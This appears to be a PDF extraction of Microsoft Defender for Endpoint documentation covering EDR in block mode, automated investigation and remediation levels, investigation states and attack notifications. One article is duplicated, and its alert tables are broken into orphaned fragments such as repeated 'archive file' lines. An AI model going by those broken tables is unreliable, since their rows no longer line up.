References Microsoft and third-party publications referenced by analysts during the

creation of the report. Threat analytics content is based on data validated by
Microsoft researchers. Information from publicly available, third-party sources
are identified clearly as such.
Change log The time the report was published and when significant changes were made
to the report.
Apply additional mitigations

Threat analytics dynamically tracks the status of security updates and secure
configurations. This information is available as charts and tables in the Mitigations tab.
In addition to these tracked mitigations, the analyst report also discusses mitigations
that are not dynamically monitored. Here are some examples of important mitigations
that are not dynamically tracked:
Block emails with .lnk attachments or other suspicious file types

Randomize local administrator passwords
Educate end users about phishing email and other threat vectors
Turn on specific attack surface reduction rules
While you can use the Mitigations tab to assess your security posture against a threat,
these recommendations let you take additional steps towards improving your security
posture. Carefully read all the mitigation guidance in the analyst report and apply them
whenever possible.
Understand how each threat can be detected

The analyst report also provides the detections from Microsoft Defender Antivirus and
endpoint detection and response (EDR) capabilities.
Antivirus detections
These detections are available on devices with Microsoft Defender Antivirus turned on.
When these detections occur on devices that have been onboarded to Microsoft
Defender for Endpoint, they also trigger alerts that light up the charts in the report.
７ Note
The analyst report also lists generic detections that can identify a wide-range of
threats, in addition to components or behaviors specific to the tracked threat.
These generic detections don't reflect in the charts.
Endpoint detection and response (EDR) alerts

EDR alerts are raised for devices onboarded to Microsoft Defender for Endpoint. These
alerts generally rely on security signals collected by the Microsoft Defender for Endpoint
sensor and other endpoint capabilities (such as antivirus, network protection, tamper
protection) that serve as powerful signal sources.
Like the list of antivirus detections, some EDR alerts are designed to generically flag
suspicious behavior that might not be associated with the tracked threat. In such cases,
the report will clearly identify the alert as "generic" and that it doesn't influence any of
the charts in the report.
Find subtle threat artifacts using advanced

hunting
While detections allow you to identify and stop the tracked threat automatically, many
attack activities leave subtle traces that require additional inspection. Some attack
activities exhibit behaviors that can also be normal, so detecting them dynamically can
result in operational noise or even false positives.
Advanced hunting provides a query interface based on Kusto Query Language that
simplifies locating subtle indicators of threat activity. It also allows you to surface
contextual information and verify whether indicators are connected to a threat.
Advanced hunting queries in the analyst reports have been vetted by Microsoft analysts
and are ready for you to run in the advanced hunting query editor . You can also use
the queries to create custom detection rules that trigger alerts for future matches.
Related topics
Threat analytics overview
Proactively find threats with advanced hunting
Custom detection rules
 Tip
Feedback

Endpoint detection and response in
block mode
Article • 01/12/2024
Applies to:

Platforms
Windows
This recommendation is primarily for devices using an active non-Microsoft antivirus

solution (with Microsoft Defender Antivirus in passive mode). There is little benefit to
enabling EDR in block mode when Microsoft Defender Antivirus is the primary antivirus
solution on devices.
What is EDR in block mode?

Endpoint detection and response (EDR) in block mode provides added protection from
malicious artifacts when Microsoft Defender Antivirus is not the primary antivirus
product and is running in passive mode.
） Important
EDR in block mode cannot provide all available protection when Microsoft
Defender Antivirus real-time protection is in passive mode. Some capabilities that
depend on Microsoft Defender Antivirus to be the active antivirus solution will not
work, such as the following examples:
Real-time protection, including on-access scanning, and scheduled scan is not

available when Microsoft Defender Antivirus is in passive mode. To learn more
about real-time protection policy settings, see Enable and configure
Microsoft Defender Antivirus always-on protection.
Features like network protection and attack surface reduction rules and
indicators (file hash, ip address, URL, and certificates) are only available when
Microsoft Defender Antivirus is running in active mode. It is expected that
your non-Microsoft antivirus solution includes these capabilities.
EDR in block mode works behind the scenes to remediate malicious artifacts that were
detected by EDR capabilities. Such artifacts might have been missed by the primary,
non-Microsoft antivirus product. EDR in block mode allows Microsoft Defender Antivirus
to take actions on post-breach, behavioral EDR detections.
EDR in block mode is integrated with threat & vulnerability management capabilities.
Your organization's security team gets a security recommendation to turn EDR in block
mode on if it isn't already enabled.
 Tip
To get the best protection, make sure to deploy Microsoft Defender for Endpoint
baselines.
Watch this video to learn why and how to turn on endpoint detection and response
(EDR) in block mode, enable behavioral blocking, and containment at every stage from
pre-breach to post-breach.
https://www.microsoft.com/en-us/videoplayer/embed/RE4HjW2?postJsllMsg=true
What happens when something is detected?

When EDR in block mode is turned on, and a malicious artifact is detected, Defender for
Endpoint remediates that artifact. Your security operations team sees the detection
status as Blocked or Prevented in the Action center, listed as completed actions. The
following image shows an instance of unwanted software that was detected and
remediated through EDR in block mode:
） Important
Make sure the requirements are met before turning on EDR in block mode. Starting
with platform version 4.18.2202.X, you can now set EDR in block mode to target
specific device groups using Intune CSPs. You can continue to set EDR in block
mode tenant-wide in the Microsoft Defender portal . EDR in block mode is
primarily recommended for devices that are running Microsoft Defender Antivirus
in passive mode (a non-Microsoft antivirus solution is installed and active on the
device).

1. Go to the Microsoft Defender portal (https://security.microsoft.com/ ) and sign
in.
2. Choose Settings > Endpoints > General > Advanced features.
3. Scroll down, and then turn on Enable EDR in block mode.

Intune
To create a custom policy in Intune, see Deploy OMA-URIs to target a CSP through
Intune, and a comparison to on-premises.
For more information on the Defender CSP used for EDR in block mode, see
"Configuration/PassiveRemediation" under Defender CSP.
Requirements for EDR in block mode

The following table lists requirements for EDR in block mode:
ﾉ Expand table
Requirement Details
Permissions You must have either the Global Administrator or Security Administrator
role assigned in Microsoft Entra ID. For more information, see Basic
permissions.
Operating system Devices must be running one of the following versions of Windows:
- Windows 11
- Windows 10 (all releases)
- Windows Server 2019 or later
- Windows Server, version 1803 or later
- Windows Server 2016 and Windows Server 2012 R2 (with the new
unified client solution)
Microsoft Defender Devices must be onboarded to Defender for Endpoint. See the following
for Endpoint articles:
- Minimum requirements for Microsoft Defender for Endpoint
- Onboard devices and configure Microsoft Defender for Endpoint
capabilities
- Onboard Windows servers to the Defender for Endpoint service
- New Windows Server 2012 R2 and 2016 functionality in the modern
unified solution
(See Is EDR in block mode supported on Windows Server 2016 and
Windows Server 2012 R2?)
Microsoft Defender Devices must have Microsoft Defender Antivirus installed and running in
Antivirus either active mode or passive mode. Confirm Microsoft Defender
Antivirus is in active or passive mode.
Cloud-delivered Microsoft Defender Antivirus must be configured such that cloud-

protection delivered protection is enabled.
Microsoft Defender Devices must be up to date. To confirm, using PowerShell, run the Get-
Antivirus platform MpComputerStatus cmdlet as an administrator. In the AMProductVersion
line, you should see 4.18.2001.10 or above.
Requirement Details
To learn more, see Manage Microsoft Defender Antivirus updates and

apply baselines.
Microsoft Defender Devices must be up to date. To confirm, using PowerShell, run the Get-
Antivirus engine MpComputerStatus cmdlet as an administrator. In the AMEngineVersion
line, you should see 1.1.16700.2 or above.
To learn more, see Manage Microsoft Defender Antivirus updates and

apply baselines.
） Important
To get the best protection value, make sure your antivirus solution is configured to
receive regular updates and essential features, and that your exclusions are
configured. EDR in block mode respects exclusions that are defined for Microsoft
Defender Antivirus, but not indicators that are defined for Microsoft Defender for
Endpoint.
See also
Endpoint detection and response (EDR) in block mode frequently asked questions
(FAQ)
 Tip
Feedback

(EDR) in block mode frequently
asked questions (FAQ)
FAQ
Applies to:

Can I specify exclusions for EDR in block

mode?
If you get a false positive, you can submit the file for analysis at the Microsoft Security
Intelligence submission site .
You can also define an exclusion for Microsoft Defender Antivirus. See Configure and
validate exclusions for Microsoft Defender Antivirus scans.
Do I need to turn EDR in block mode on

if I have Microsoft Defender Antivirus
running on devices?
The primary purpose of EDR in block mode is to remediate post-breach detections that
were missed by a non-Microsoft antivirus product. There is minimal benefit in enabling
EDR in block mode when Microsoft Defender Antivirus is in active mode, because real-
time protection is expected to catch and remediate detections first. We recommend
enabling EDR in block mode on endpoints where Microsoft Defender for Antivirus is
running in passive mode. EDR detections can be automatically remediated by PUA
protection or by automated investigation & remediation capabilities in block mode.
７ Note
Microsoft recommends enabling EDR in block mode, even when primary antivirus
software on the system is Microsoft Defender Antivirus.
Will EDR in block mode affect a user's
antivirus protection?
EDR in block mode does not affect third-party antivirus protection running on users'
devices. EDR in block mode works if the primary antivirus solution misses something, or
if there is a post-breach detection. EDR in block mode works just like Microsoft
Defender Antivirus in passive mode, except that EDR in block mode also blocks and
remediates malicious artifacts or behaviors that are detected.
Why do I need to keep Microsoft

Defender Antivirus up to date?
Because Microsoft Defender Antivirus detects and remediates malicious items, it's
important to keep it up to date. For EDR in block mode to be effective, it uses the latest
device learning models, behavioral detections, and heuristics. The Defender for Endpoint
stack of capabilities works in an integrated manner. To get best protection value, you
should keep Microsoft Defender Antivirus up to date. See Manage Microsoft Defender
Antivirus updates and apply baselines.
Why do we need cloud protection

(MAPS) on?
Cloud protection is needed to turn on the feature on the device. Cloud protection allows
Defender for Endpoint to deliver the latest and greatest protection based on our
breadth and depth of security intelligence, along with behavioral and device learning
models.
What is the difference between active

and passive mode?
For endpoints running Windows 10, Windows 11, Windows Server, version 1803 or later,
Windows Server 2019, or Windows Server 2022 when Microsoft Defender Antivirus is in
active mode, it is used as the primary antivirus on the device. When running in passive
mode, Microsoft Defender Antivirus is not the primary antivirus product. In this case,
threats are not remediated by Microsoft Defender Antivirus in real time.
７ Note
Microsoft Defender Antivirus can run in passive mode only when the device is
onboarded to Microsoft Defender for Endpoint.
For more information, see Microsoft Defender Antivirus compatibility.
How do I confirm Microsoft Defender

Antivirus is in active or passive mode?
To confirm whether Microsoft Defender Antivirus is running in active or passive mode,
you can use Command Prompt or PowerShell on a device running Windows.
ﾉ Expand table
Method Procedure
PowerShell 1. Select the Start menu, begin typing PowerShell , and then open
Windows PowerShell in the results.
2. Type Get-MpComputerStatus .
3. In the list of results, in the AMRunningMode row, look for one of the
following values:
- Normal
- Passive Mode
To learn more, see Get-MpComputerStatus.
Command
Prompt 1. Select the Start menu, begin typing Command Prompt , and then
open Windows Command Prompt in the results.
2. Type sc query windefend .
3. In the list of results, in the STATE row, confirm that the service is
running.
How do I confirm that EDR in block

mode is turned on with Microsoft
Defender Antivirus in passive mode?
You can use PowerShell to confirm that EDR in block mode is turned on with Microsoft
Defender Antivirus running in passive mode.
1. Select the Start menu, begin typing PowerShell , and then open Windows
PowerShell in the results.
2. Type Get-MPComputerStatus|select AMRunningMode .
3. Confirm that the result, EDR Block Mode , is displayed.
 Tip
If Microsoft Defender Antivirus is in active mode, you will see Normal instead of EDR
Block Mode . To learn more, see Get-MpComputerStatus.
Is EDR in block mode supported on

Windows Server 2016 and Windows
Server 2012 R2?
If Microsoft Defender Antivirus is running in active mode or passive mode, EDR in block
mode is supported of the following versions of Windows:
Windows 11
Windows 10 (all releases)
Windows Server, version 1803 or newer
Windows Server 2022
Windows Server 2019
Windows Server 2016 and Windows Server 2012 R2 (with the new unified client
solution)
With the new unified client solution for Windows Server 2016 and Windows Server 2012
R2, you can run EDR in block mode in either passive mode or active mode.
７ Note
Windows Server 2016 and Windows Server 2012 R2 must be onboarded using the
instructions in Onboard Windows servers for this feature to work.
How much time does it take for EDR in
block mode to be disabled?
If you choose to disable EDR in block mode, it can take up to 30 minutes for the system
to disable this capability.
See also
Endpoint detection and response in block mode
Tech Community blog: Introducing EDR in block mode: Stopping attacks in their
tracks
Feedback

Overview of automated investigations
Article • 12/22/2022
Applies to:

Platforms
Windows
Want to see how it works? Watch the following video:

https://www.microsoft.com/en-us/videoplayer/embed/RE4bOeh?postJsllMsg=true
The technology in automated investigation uses various inspection algorithms and is

based on processes that are used by security analysts. AIR capabilities are designed to
examine alerts and take immediate action to resolve breaches. AIR capabilities
significantly reduce alert volume, allowing security operations to focus on more
sophisticated threats and other high-value initiatives. All remediation actions, whether
pending or completed, are tracked in the Action center. In the Action center, pending
actions are approved (or rejected), and completed actions can be undone if needed.
This article provides an overview of AIR and includes links to next steps and additional
resources.
 Tip
How the automated investigation starts

An automated investigation can start when an alert is triggered or when a security
operator initiates the investigation.
ﾉ Expand table
Situation What happens
An alert is In general, an automated investigation starts when an alert is triggered, and an

triggered incident is created. For example, suppose a malicious file resides on a device.
Situation What happens
When that file is detected, an alert is triggered, and incident is created. An

automated investigation process begins on the device. As other alerts are
generated because of the same file on other devices, they are added to the
associated incident and to the automated investigation.
An investigation An automated investigation can be started manually by your security

is started operations team. For example, suppose a security operator is reviewing a list of
manually devices and notices that a device has a high risk level. The security operator
can select the device in the list to open its flyout, and then select Initiate
Automated Investigation.
How an automated investigation expands its

scope
While an investigation is running, any other alerts generated from the device are added
to an ongoing automated investigation until that investigation is completed. In addition,
if the same threat is seen on other devices, those devices are added to the investigation.
If an incriminated entity is seen in another device, the automated investigation process

expands its scope to include that device, and a general security playbook starts on that
device. If 10 or more devices are found during this expansion process from the same
entity, then that expansion action requires an approval, and is visible on the Pending
actions tab.
How threats are remediated

As alerts are triggered, and an automated investigation runs, a verdict is generated for
each piece of evidence investigated. Verdicts can be:
Malicious;
Suspicious; or
No threats found.
As verdicts are reached, automated investigations can result in one or more remediation
actions. Examples of remediation actions include sending a file to quarantine, stopping a
service, removing a scheduled task, and more. To learn more, see Remediation actions.
Depending on the level of automation set for your organization, as well as other security
settings, remediation actions can occur automatically or only upon approval by your
security operations team. Additional security settings that can affect automatic
remediation include protection from potentially unwanted applications (PUA).
All remediation actions, whether pending or completed, are tracked in the Action center.
If necessary, your security operations team can undo a remediation action. To learn
more, see Review and approve remediation actions following an automated
investigation.
 Tip
Check out the new, unified investigation page in the Microsoft Defender portal. To
learn more, see Unified investigation page.
Requirements for AIR

Your subscription must include Defender for Endpoint or Defender for Business.
７ Note
Automated investigation and response requires Microsoft Defender Antivirus for

running in passive mode or active mode. If Microsoft Defender Antivirus is disabled
or uninstalled, Automated Investigation and Response will not function correctly.
Currently, AIR only supports the following OS versions:
Windows Server 2012 R2 (Preview)

Windows Server 2016 (Preview)
Windows Server 2019
Windows Server 2022
Windows 10, version 1709 (OS Build 16299.1085 with KB4493441 ) or later
Windows 11
７ Note
Automated investigation and response on Windows Server 2012 R2 and Windows

Server 2016 requires the Unified Agent to be installed.
Next steps
Learn more about automation levels
See the interactive guide: Investigate and remediate threats with Microsoft
Configure automated investigation and remediation capabilities in Microsoft
See also
PUA protection
Automated investigation and response in Microsoft Defender for Office 365
Automated investigation and response in Microsoft Defender XDR
 Tip
Feedback

Automation levels in automated
investigation and remediation
capabilities
Article • 07/31/2023
Applies to:

Automated investigation and remediation (AIR) capabilities in Microsoft Defender for

Business are preconfigured and aren't configurable. In Microsoft Defender for Endpoint,
you can configure AIR to one of several levels of automation. Your automation level
affects whether remediation actions following AIR investigations are taken automatically
or only upon approval.
Full automation (recommended) means remediation actions are taken

automatically on artifacts determined to be malicious. (Full automation is set by
default in Defender for Business.)
Semi-automation means some remediation actions are taken automatically, but
other remediation actions await approval before being taken. (See the table in
Levels of automation.)
All remediation actions, whether pending or completed, are tracked in the Action
Center (https://security.microsoft.com ).
 Tip
For best results, we recommend using full automation when you configure AIR.
Data collected and analyzed over the past year shows that customers who are using
full automation had 40% more high-confidence malware samples removed than
customers who are using lower levels of automation. Full automation can help free
up your security operations resources to focus more on your strategic initiatives.
７ Note
Levels of automation
ﾉ Expand table
Automation level Description
Full - remediate With full automation, remediation actions are performed automatically on
threats entities that are considered to be malicious. All remediation actions that are
automatically taken can be viewed in the Action Center on the History tab. If necessary, a
(also referred to as remediation action can be undone.
full automation)
Full automation is recommended and is selected by default for tenants with
Defender for Endpoint that were created on or after August 16, 2020, with no
device groups defined yet.
Full automation is set by default in Defender for Business.
Semi - require With this level of semi-automation, approval is required for remediation
approval for all actions on all files. Such pending actions can be viewed and approved in the
folders Action Center, on the Pending tab. Pending actions time out after 7 days. If
(also referred to as an action times out, the behavior is the same as if the action is rejected.
semi-automation)
This level of semi-automation is selected by default for tenants that were
created before August 16, 2020 with Microsoft Defender for Endpoint, with no
device groups defined.
Semi - require With this level of semi-automation, approval is required for any remediation
approval for core actions needed on files or executables that are in core folders. Core folders
folders include operating system directories, such as the Windows ( \windows\* ).
remediation
(also a type of Remediation actions can be taken automatically on files or executables that
semi-automation) are in other (non-core) folders.
Pending actions for files or executables in core folders can be viewed and
approved in the Action Center, on the Pending tab.
Actions that were taken on files or executables in other folders can be

viewed in the Action Center, on the History tab.
Semi - require With this level of semi-automation, approval is required for any remediation
approval for non- actions needed on files or executables that aren't* in temporary folders.
temp folders Temporary folders can include the following examples:
remediation
(also a type of \users\*\appdata\local\temp\*
semi-automation) \documents and settings\*\local settings\temp\*

\documents and settings\*\local settings\temporary\*
\windows\temp\*
\users\*\downloads\*
\program files\
\program files (x86)\*
Automation level Description
\documents and settings\*\users\*
Remediation actions can be taken automatically on files or executables that

are in temporary folders.
Pending actions for files or executables that aren't in temporary folders can
be viewed and approved in the Action Center, on the Pending tab.
Actions that were taken on files or executables in temporary folders can be

viewed and approved in the Action Center, on the History tab.
No automated With no automation, automated investigation doesn't run on your

response organization's devices. As a result, no remediation actions are taken or
(also referred to as pending as a result of automated investigation. However, other threat
no automation) protection features, such as protection from potentially unwanted
applications, can be in effect, depending on how your antivirus and next-
generation protection features are configured.
*Using the no automation option is not recommended, because it reduces

the security posture of your organization's devices. Consider setting up your
automation level to full automation (or at least semi-automation).
Important points about automation levels

Full automation has proven to be reliable, efficient, and safe, and is recommended
for all customers. Full automation frees up your critical security resources so they
can focus more on your strategic initiatives.
New tenants (which include tenants that were created on or after August 16, 2020)
with Defender for Endpoint are set to full automation by default.
Defender for Business uses full automation by default. Defender for Business
doesn't use device groups the same way as Defender for Endpoint. Thus, full
automation is turned on and applied to all devices in Defender for Business.
If your security team has defined device groups with a level of automation, those
settings aren't changed by the new default settings that are rolling out.
You can keep your default automation settings, or change them according to your
organizational needs. To change your settings, set your level of automation.
７ Note
Defender for Business depends on real-time protection for automatic

investigation. Real-time protection must be enabled and in active mode to enable
automatic investigation.
Next steps
Configure automated investigation and remediation capabilities in Defender for
Endpoint
Visit the Action Center
 Tip
Feedback

Configure automated investigation and
remediation capabilities in Microsoft
Article • 02/16/2024
Applies to:

If your organization is using Defender for Endpoint (or Defender for Business),
automated investigation and remediation capabilities can save your security operations
team time and effort. As outlined in this blog post , these capabilities mimic the ideal
steps that a security analyst takes to investigate and remediate threats. Learn more
about automated investigation and remediation.
If you're using Defender for Endpoint, you can specify an automation level so that when
a threat is detected on a device, the entity can be remediated automatically or only
upon approval by your security team. You can configure automated investigation and
remediation with device groups.
７ Note
In Defender for Business, automated investigation is configured automatically. See

advanced features.
Set up device groups

1. In the Microsoft Defender portal (https://security.microsoft.com ), on the Settings
page, under Permissions, select Device groups.
2. Select + Add device group.
3. Create at least one device group, as follows:
Specify a name and description for the device group.

In the Automation level list, select a level, such as Full - remediate threats
automatically. The automation level determines whether remediation actions
are taken automatically, or only upon approval. To learn more, see
Automation levels in automated investigation and remediation.
In the Members section, use one or more conditions to identify and include
devices.
4. Select Done when you're finished setting up your device group.
７ Note
The Automated Investigation option has been removed from the advanced
features setting in Defender for Endpoint. Automated investigation is now enabled
by default.
Next steps
Visit the Action Center to view pending and completed remediation actions
Review and approve pending actions
See also
Automation levels in automated investigation and remediation
 Tip
Feedback

View the details and results of an
Article • 02/21/2024
Applies to:
With Microsoft Defender for Endpoint, when an automated investigation runs, details
about that investigation are available both during and after the automated investigation
process. If you have the necessary permissions, you can view those details in an
investigation details view. The investigation details view provides you with up-to-date
status and the ability to approve any pending actions.
(NEW!) Unified investigation page

The investigation page has recently been updated to include information across your
devices, email, and collaboration content. The new, unified investigation page defines a
common language and provides a unified experience for automatic investigations across
Microsoft Defender for Endpoint and Microsoft Defender for Office 365.
 Tip
To learn more about what's changing, see (NEW!) Unified investigation page.
Open the investigation details view

You can open the investigation details view by using one of the following methods:
Select an item in the Action center

Select an investigation from an incident details page

The improved Action center brings together remediation actions across your devices,
email & collaboration content, and identities. Listed actions include remediation actions
that were taken automatically or manually. In the Action center, you can view actions
that are awaiting approval and actions that were already approved or completed. You
can also navigate to more details, such as an investigation page.
1. Go to Microsoft Defender XDR and sign in.
3. On either the Pending or History tab, select an item. Its flyout pane opens.
4. Review the information in the flyout pane, and then take one of the following
steps:
Open an investigation from an incident details page

Use an incident details page to view detailed information about an incident, including
alerts that were triggered information about any affected devices, user accounts, or
mailboxes.

2. In the navigation pane, choose Incidents & alerts > Incidents.
3. Select an item in the list, and then choose Open incident page.
4. Select the Investigations tab, and then select an investigation in the list. Its flyout
pane opens.
5. Select Open investigation page.
Investigation details
Use the investigation details view to see past, current, and pending activity pertaining to
an investigation. The investigation details view resembles the following image:
In the Investigation details view, you can see information on the Investigation graph,
Alerts, Devices, Identities, Key findings, Entities, Log, and Pending actions tabs,
described in the following table.
７ Note
The specific tabs you see in an investigation details page depends on what
your subscription includes. For example, if your subscription does not include
Microsoft Defender for Office 365 Plan 2, you won't see a Mailboxes tab.
2.
ﾉ Expand table
Tab Description
Investigation Provides a visual representation of the investigation. Depicts entities and lists
graph threats found, along with alerts and whether any actions are awaiting approval.
You can select an item on the graph to view more details. For example, selecting
the Evidence icon takes you to the Evidence tab, where you can see detected
entities and their verdicts.
Alerts Lists alerts associated with the investigation. Alerts can come from threat
protection features on a user's device, in Office apps, Defender for Cloud Apps,
and other Microsoft Defender XDR features.
Devices Lists devices included in the investigation along with their remediation level.
(Remediation levels correspond to the automation level for device groups.)
Mailboxes Lists mailboxes that are impacted by detected threats.
Users Lists user accounts that are impacted by detected threats.
Evidence Lists pieces of evidence raised by alerts/investigations. Includes verdicts

(Malicious, Suspicious, or No threats found) and remediation status.
Entities Provides details about each analyzed entity, including a verdict for each entity
type (Malicious, Suspicious, or No threats found).
Log Provides a chronological, detailed view of all the investigation actions taken
after an alert was triggered.
Pending Lists items that require approval to proceed. Go to the Action center
actions (https://security.microsoft.com/action-center ) to approve pending actions.
Investigation states
The following table lists investigation states and what they indicate.
ﾉ Expand table
Investigation state Definition
Benign Artifacts were investigated and a determination was made that no

threats were found.
PendingResource An automated investigation is paused because either a remediation

action is pending approval, or the device on which an artifact was found
is temporarily unavailable.
UnsupportedAlertType An automated investigation is not available for this type of alert. Further
investigation can be done manually, by using advanced hunting.
Failed At least one investigation analyzer ran into a problem where it couldn't
complete the investigation. If an investigation fails after remediation
actions were approved, the remediation actions might still have
succeeded.
Successfully An automated investigation completed, and all remediation actions

remediated were completed or approved.
To provide more context about how investigation states show up, the following table
lists alerts and their corresponding automated investigation state. This table is included
as an example of what a security operations team might see in the Microsoft Defender
portal.
ﾉ Expand table
Alert name Severity Investigation state Status Category
Malware was detected in a wim Informational Benign Resolved Malware

disk image file
Malware was detected in a rar Informational PendingResource New Malware

archive file
Malware was detected in a rar Informational UnsupportedAlertType New Malware

archive file

archive file

archive file
Malware was detected in a zip Informational PendingResource New Malware

archive file

archive file

archive file

archive file
Wpakill hacktool was prevented Low Failed New Malware
GendowsBatch hacktool was Low Failed New Malware

prevented
Keygen hacktool was prevented Low Failed New Malware

archive file

archive file

archive file

archive file

archive file

archive file
Malware was detected in an iso Informational PendingResource New Malware

disc image file

disc image file
Malware was detected in a pst Informational UnsupportedAlertType New Malware

outlook data file

outlook data file
MediaGet detected Medium PartiallyInvestigated New Malware
TrojanEmailFile Medium SuccessfullyRemediated Resolved Malware
CustomEnterpriseBlock Informational SuccessfullyRemediated Resolved Malware

malware was prevented
An active Low SuccessfullyRemediated Resolved Malware

CustomEnterpriseBlock
malware was blocked

malware was blocked

malware was blocked
TrojanEmailFile Medium Benign Resolved Malware
CustomEnterpriseBlock Informational UnsupportedAlertType New Malware


An active Low PendingResource New Malware

malware was blocked
See also
Review remediation actions following an automated investigation
View and organize the Microsoft Defender for Endpoint Incidents queue
 Tip
Feedback

View the details and results of an
Article • 02/21/2024
Applies to:
With Microsoft Defender for Endpoint, when an automated investigation runs, details
about that investigation are available both during and after the automated investigation
process. If you have the necessary permissions, you can view those details in an
investigation details view. The investigation details view provides you with up-to-date
status and the ability to approve any pending actions.
(NEW!) Unified investigation page

The investigation page has recently been updated to include information across your
devices, email, and collaboration content. The new, unified investigation page defines a
common language and provides a unified experience for automatic investigations across
Microsoft Defender for Endpoint and Microsoft Defender for Office 365.
 Tip
To learn more about what's changing, see (NEW!) Unified investigation page.
Open the investigation details view

You can open the investigation details view by using one of the following methods:

Select an investigation from an incident details page

The improved Action center brings together remediation actions across your devices,
email & collaboration content, and identities. Listed actions include remediation actions
that were taken automatically or manually. In the Action center, you can view actions
that are awaiting approval and actions that were already approved or completed. You
can also navigate to more details, such as an investigation page.
3. On either the Pending or History tab, select an item. Its flyout pane opens.
4. Review the information in the flyout pane, and then take one of the following
steps:
Open an investigation from an incident details page

Use an incident details page to view detailed information about an incident, including
alerts that were triggered information about any affected devices, user accounts, or
mailboxes.

2. In the navigation pane, choose Incidents & alerts > Incidents.
3. Select an item in the list, and then choose Open incident page.
4. Select the Investigations tab, and then select an investigation in the list. Its flyout
pane opens.
5. Select Open investigation page.
Investigation details
Use the investigation details view to see past, current, and pending activity pertaining to
an investigation. The investigation details view resembles the following image:
In the Investigation details view, you can see information on the Investigation graph,
Alerts, Devices, Identities, Key findings, Entities, Log, and Pending actions tabs,
described in the following table.
７ Note
The specific tabs you see in an investigation details page depends on what
your subscription includes. For example, if your subscription does not include
Microsoft Defender for Office 365 Plan 2, you won't see a Mailboxes tab.
2.
ﾉ Expand table
Tab Description
Investigation Provides a visual representation of the investigation. Depicts entities and lists
graph threats found, along with alerts and whether any actions are awaiting approval.
You can select an item on the graph to view more details. For example, selecting
the Evidence icon takes you to the Evidence tab, where you can see detected
entities and their verdicts.
Alerts Lists alerts associated with the investigation. Alerts can come from threat
protection features on a user's device, in Office apps, Defender for Cloud Apps,
and other Microsoft Defender XDR features.
Devices Lists devices included in the investigation along with their remediation level.
(Remediation levels correspond to the automation level for device groups.)
Mailboxes Lists mailboxes that are impacted by detected threats.
Users Lists user accounts that are impacted by detected threats.
Evidence Lists pieces of evidence raised by alerts/investigations. Includes verdicts

(Malicious, Suspicious, or No threats found) and remediation status.
Entities Provides details about each analyzed entity, including a verdict for each entity
type (Malicious, Suspicious, or No threats found).
Log Provides a chronological, detailed view of all the investigation actions taken
after an alert was triggered.
Pending Lists items that require approval to proceed. Go to the Action center
actions (https://security.microsoft.com/action-center ) to approve pending actions.
Investigation states
The following table lists investigation states and what they indicate.
ﾉ Expand table
Benign Artifacts were investigated and a determination was made that no

threats were found.
PendingResource An automated investigation is paused because either a remediation

action is pending approval, or the device on which an artifact was found
is temporarily unavailable.
UnsupportedAlertType An automated investigation is not available for this type of alert. Further
investigation can be done manually, by using advanced hunting.
Failed At least one investigation analyzer ran into a problem where it couldn't
complete the investigation. If an investigation fails after remediation
actions were approved, the remediation actions might still have
succeeded.
Successfully An automated investigation completed, and all remediation actions

remediated were completed or approved.
To provide more context about how investigation states show up, the following table
lists alerts and their corresponding automated investigation state. This table is included
as an example of what a security operations team might see in the Microsoft Defender
portal.
ﾉ Expand table
Malware was detected in a wim Informational Benign Resolved Malware

disk image file

archive file

archive file

archive file

archive file

archive file

archive file

archive file

archive file
Wpakill hacktool was prevented Low Failed New Malware
GendowsBatch hacktool was Low Failed New Malware

prevented
Keygen hacktool was prevented Low Failed New Malware

archive file

archive file

archive file

archive file

archive file

archive file

disc image file

disc image file

outlook data file

outlook data file
MediaGet detected Medium PartiallyInvestigated New Malware


malware was blocked

malware was blocked

malware was blocked
CustomEnterpriseBlock Informational UnsupportedAlertType New Malware


An active Low PendingResource New Malware

malware was blocked
See also
Review remediation actions following an automated investigation
View and organize the Microsoft Defender for Endpoint Incidents queue
 Tip
Feedback

Customize, initiate, and review the
results of Microsoft Defender Antivirus
scans and remediation
Article • 02/27/2024
Applies to:

You can use Group Policy, PowerShell, and Windows Management Instrumentation
(WMI) to configure Microsoft Defender Antivirus scans.
ﾉ Expand table
Article Description
Configure and validate file, folder, You can exclude files (including files modified by specified
and process-opened file processes) and folders from on-demand scans, scheduled
exclusions in Microsoft Defender scans, and always-on real-time protection monitoring and
Antivirus scans scanning
Configure Microsoft Defender You can configure Microsoft Defender Antivirus to include
Antivirus scanning options certain types of email storage files, back-up or reparse
points, and archived files (such as .zip files) in scans. You can
also enable network file scanning
Configure remediation for scans Configure what Microsoft Defender Antivirus should do
when it detects a threat, and how long quarantined files
should be retained in the quarantine folder
Configure scheduled scans Set up recurring (scheduled) scans, including when they
should run and whether they run as full or quick scans
Configure and run scans Run and configure on-demand scans using PowerShell,
Windows Management Instrumentation, or individually on
endpoints with the Windows Security app
Review scan results Review the results of scans using Microsoft Endpoint
Configuration Manager, Microsoft Intune, or the Windows
Security app
 Tip
Feedback

Endpoint Attack Notifications
Article • 07/18/2023
Applies to:

７ Note
This covers threat hunting on your Microsoft Defender for Endpoint service.
However, if you're interested to explore the service beyond your current license,
and proactively hunt threats not just on endpoints but also across Office 365, cloud
applications, and identity, refer to Microsoft Defender Experts for Hunting.
７ Note
Customers who signed up for Experts on Demand prior to sunset will have access
to Ask Defender Experts until the expiration of their current contract.
Endpoint Attack Notifications (previously referred to as Microsoft Threat Experts -

Targeted Attack Notification) provides proactive hunting for the most important threats
to your network, including human adversary intrusions, hands-on-keyboard attacks, or
advanced attacks like cyber-espionage. These notifications show up as a new alert. The
managed hunting service includes:
Threat monitoring and analysis, reducing dwell time and risk to the business
Hunter-trained artificial intelligence to discover and prioritize both known and
unknown attacks
Identifying the most important risks, helping SOCs maximize time and energy
Scope of compromise and as much context as can be quickly delivered to enable
fast SOC response
Apply for Endpoint Attack Notifications
If you're a Microsoft Defender for Endpoint customer, you can apply for Endpoint Attack
Notifications. Go to Settings > Endpoints > General > Advanced features > Endpoint
Attack Notifications to apply. Once accepted, you'll get the benefits of Endpoint Attack
Notifications.
Receive Endpoint Attack notifications
Endpoint Attack Notifications are alerts that have been hand crafted by Microsoft's
managed hunting service based on suspicious activity in your environment. They can be
viewed through several mediums:
The alerts queue in the Microsoft Defender portal

Using the API
DeviceAlertEvents table in Advanced hunting
Your email if you configure an email notifications rule
Endpoint Attack Notifications can be identified by:
Have a tag named Endpoint Attack Notification

Have a service source of Microsoft Defender for Endpoint > Microsoft Defender
Experts
７ Note
If you have enrolled for Endpoint Attack Notifications but are not seeing any alerts
from the service, it indicates that you have a strong security posture and are less
prone to attacks.
Create an email notification rule

